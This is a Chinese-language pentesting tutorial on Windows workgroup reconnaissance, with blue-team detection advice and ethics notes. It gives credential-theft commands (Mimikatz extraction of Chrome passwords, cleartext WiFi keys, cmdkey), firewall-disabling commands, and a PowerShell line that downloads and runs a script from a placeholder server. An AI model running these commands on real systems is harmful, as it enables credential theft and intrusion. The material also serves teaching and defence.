内网渗透中的“眼睛”与“耳朵”：工作组信息收集技术全解析

在授权渗透测试中，高效的信息收集是横向移动的基石。掌握这些命令，你就能像管理员一样“看见”整个系统。

前言：为何信息收集如此重要？

在内网渗透测试中，当我们获得一台主机的初步访问权限后，首要任务就是了解所处的环境。这就像特种部队进入陌生建筑后，首先要绘制内部地图、标记出入口、识别威胁一样。

Windows工作组环境虽然不如域环境复杂，但其中蕴藏着大量对攻击者有价值的信息：凭证、网络配置、安全策略、敏感文件等。本文将系统性地整理Windows工作组环境下的信息收集技术，帮助你在授权测试中高效定位薄弱点。

一、系统环境侦察：了解你的“落脚点”

1.1 系统基本信息收集

首先，了解你所处系统的基本情况是至关重要的第一步。

:: 查看系统体系结构（判断是32位还是64位系统） echo %PROCESSOR_ARCHITECTURE% :: 查看系统补丁情况（寻找未修补的漏洞） systeminfo | findstr KB :: 或获取更详细的补丁信息 wmic qfe get Caption,Description,HotFixID,InstalledOn :: 查看系统启动时间（判断系统运行稳定性、可能的维护窗口） net statistics workstation

实战价值：系统架构信息决定了后续攻击载荷的选择；补丁信息直接关联到可用的本地提权漏洞；系统运行时间可能暗示维护周期（长时间运行的系统可能更脆弱）。

1.2 进程与服务分析

了解系统正在运行什么，是发现异常和安全产品的关键。

:: 查看当前进程列表 tasklist :: 或使用WMI获取更详细进程信息 wmic process list brief :: 查看本机服务信息 wmic service list brief :: 查看已安装软件 wmic product get name, version :: PowerShell替代方案（有时更可靠） powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"

攻击视角：

• 寻找安全软件进程（如avp.exe,MsMpEng.exe等）
• 识别高权限进程（特别是以SYSTEM或管理员身份运行的）
• 发现数据库、中间件等可能包含敏感数据的应用
• 查找运维工具（如TeamViewer、AnyDesk、向日葵等）

1.3 启动项与计划任务

持久化机制不仅攻击者关心，防御者也应关注。

:: 查看启动程序（寻找可疑的持久化后门） wmic startup get command,caption :: 查看计划任务（Windows 10以后） schtasks /query /fo LIST /v :: Windows 10之前使用 at

安全意义：启动项和计划任务是恶意软件常用的持久化手段，也是攻击者提权后常利用的机制。检查这些位置可能发现已经存在的后门或创建新的持久化点。

二、凭证与敏感信息挖掘

2.1 网络凭证与会话信息

:: 查看保存的远程连接凭证 cmdkey /l :: 查看当前会话信息 net session :: 查看本地密码策略 net accounts

攻击价值：cmdkey中保存的凭证可能让你直接访问其他系统；net session显示谁连接到了这台主机；密码策略帮助设计破解策略。

2.2 浏览器数据提取

浏览器中往往保存着大量敏感信息。

:: 查看Chrome历史记录位置 explore %localappdata%\google\chrome\USERDA~1\default\LOGIND~1 :: 查看Chrome Cookie位置 dir %localappdata%\google\chrome\USERDA~1\default\cookies :: 使用Mimikatz提取Chrome保存的密码（需要相应权限） mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit

重要提醒：浏览器数据提取涉及用户隐私，必须在授权测试范围内进行，且需遵守相关法律法规和测试协议。

2.3 回收站中的秘密

:: 提取回收站内容 FOR /f "skip=1 tokens=1,*" %a in ('wmic useraccount get name^,sid') do @for /f "tokens=1,2" %c in ("%a %b") do dir /a /b "C:\$Recycle.Bin\%d\" > "%c.txt" 2>nul

有趣发现：用户删除的文件可能仍包含敏感信息。我曾经在回收站中发现过包含密码的txt文件、数据库备份、甚至加密密钥。

三、网络与共享信息

3.1 网络配置与连接

:: 查看所有网络连接及对应进程 netstat -anob :: 查看路由表 route print :: 查看ARP缓存 arp -a :: 查看DNS缓存 ipconfig /displaydns :: 查看Hosts文件（可能包含内部域名解析） type c:\Windows\system32\drivers\etc\hosts

战术意义：

• netstat -anob显示谁在监听、谁在连接，以及是哪个进程
• 路由表和ARP缓存揭示网络拓扑
• DNS缓存可能泄露内部域名
• Hosts文件可能包含测试环境或内部系统的映射

3.2 共享资源发现

:: 查看本地共享 net share :: 或使用WMI wmic share get name,path,status :: 连接共享（如果权限允许） net use k: \\IP\C$

横向移动：共享是工作组环境中横向移动的主要途径之一。管理员共享（C、ADMIN、ADMIN、ADMIN）如果配置不当，可能直接提供系统级访问。

四、持久化与防御规避点

4.1 防火墙配置

:: 查看防火墙配置 netsh firewall show config :: 或对于高级防火墙 netsh advfirewall show allprofiles :: 查看具体规则 netsh advfirewall firewall show rule name=all :: 关闭防火墙（仅用于授权测试中的权限验证） :: Windows Server 2003以前 netsh firewall set opmode disable :: Windows Server 2003以后 netsh advfirewall set allprofiles state off

防御绕过：了解防火墙配置有助于设计绕过策略。但注意，在真实攻击中直接关闭防火墙会触发警报，在测试中也需要谨慎操作。

4.2 代理与网络设置

:: 查询代理设置 REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer :: 查看PAC自动代理配置 REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL

出口控制：代理设置影响外联流量。在C2基础设施规划中，了解目标代理配置至关重要。

五、应用与用户痕迹

5.1 WiFi凭证提取

:: 查看保存的WiFi配置文件 netsh wlan show profile :: 查看特定WiFi的详细信息（包括密码） netsh wlan show profile name="SSID名称" key=clear

物理安全扩展：WiFi密码可能帮助你扩展到物理网络访问。但同样，这必须在授权范围内进行。

5.2 综合信息收集脚本

对于系统化的收集，可以使用PowerShell脚本：

# 示例：简单的信息收集脚本powershelliex(new-objectnet.webclient).downloadstring('http://your-server/Get-Information.ps1');Get-Information

脚本设计建议：一个好的信息收集脚本应该：

1. 模块化收集不同类型的信息
2. 包含错误处理，避免因单点失败而中断
3. 输出结构化数据（JSON、XML等）
4. 包含时间戳和主机标识
5. 提供加密传输选项

六、防御视角：如何检测这些信息收集行为？

作为蓝队成员，了解攻击者的技术意味着你能更好地防御他们：

6.1 监控关键命令的执行

• 监控wmic、netstat、netsh等命令的非常规使用
• 特别关注来自非常规位置或用户的这些命令执行

6.2 审计敏感文件访问

• 监控对浏览器数据目录、回收站、凭证存储的访问
• 设置对%localappdata%\Google\Chrome\User Data\等路径的访问警报

6.3 实施最小权限原则

• 普通用户不应有权运行netsh advfirewall或wmic startup
• 限制对敏感注册表键的访问

6.4 部署行为检测

• 检测短时间内大量信息收集命令的执行模式
• 关注进程创建树中的异常模式

七、最佳实践与道德考量

7.1 白帽子守则

1. 明确授权：确保所有操作都在授权范围内进行
2. 最小影响：避免对业务系统造成不必要的影响
3. 数据保护：收集的敏感数据必须安全存储和处理
4. 清晰报告：详细记录发现，提供可操作的修复建议

7.2 测试技巧

1. 分阶段收集：先收集基本信息，再针对性地深入
2. 多种方法验证：重要信息通过多种途径验证
3. 注意操作时机：避免在业务高峰进行可能影响性能的操作
4. 保存原始输出：便于后续分析和报告编写

结语：信息收集是艺术也是科学

有效的信息收集是渗透测试成功的关键。它既需要系统性的方法（科学），又需要根据实际情况灵活调整的能力（艺术）。记住，你不是在运行一堆孤立的命令，而是在通过每个命令的输出了解目标环境，构建攻击路径。

本文介绍的技术是基础，但绝非全部。真正的专家会根据目标环境定制收集策略，知道在什么情况下使用什么技术，以及如何解释收集到的信息。持续学习、实践，并在每次测试后复盘，你才能在这条路上走得更远。

记住：你的目标是发现问题、帮助改善安全，而不是造成损害。技术是双刃剑，使用它的人决定了它的方向。

作者注：本文所有技术均在授权测试环境中验证。未经授权的使用可能违反法律，请务必遵守网络安全法律法规，仅将知识用于合法合规的安全测试工作中。